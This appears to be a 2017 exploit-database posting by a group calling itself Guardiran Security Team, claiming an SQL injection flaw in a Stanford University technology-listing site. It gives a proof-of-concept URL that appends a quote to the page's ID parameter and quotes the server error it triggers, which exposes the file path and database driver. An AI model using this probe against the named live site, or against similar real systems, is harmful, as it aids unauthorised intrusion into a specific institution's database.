###########################

# Technology Stanford sql Injection Vulnerability

###########################

# Title: Technology Stanford sql Injection
# date: 4/28/2017
# Exploit Author : Guardiran Security Team
# Google Dork : -
# Softwar Link : -
# Vendor Homepage: http://techfinder.stanford.edu
# Tested On : Kali Linux w3af / Windows 8.1


hello guyd.
technology stanford university have sqli bug.
we can inject and do something



-- response Error --

Warning: PDOStatement::execute(): SQLSTATE[08004]: Server rejected the connection: 1301 Server rejected the connection: Failed to parse statement. (SQLExecute[1301] at ext\pdo_odbc\odbc_stmt.c:254) in C:\inetpub\wwwroot\technology_detail.php on line 483



Poc:
Page vulnerable :
[technology_detail.php]
Inject :
http://techfinder.stanford.edu/technology_detail.php?ID=74%27




* Special Tnx : cod3!nj3ct!0n , REX , alizombie , abarestan , DeMoN , reza attacker , No_one , 1TED , J.ALL_Editor , S9pY , Proxy And All Member of Guardiran Security Team
* Discovered By : DeMoN
* We Are Guardiran Security Team

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2017-05-03]

###########################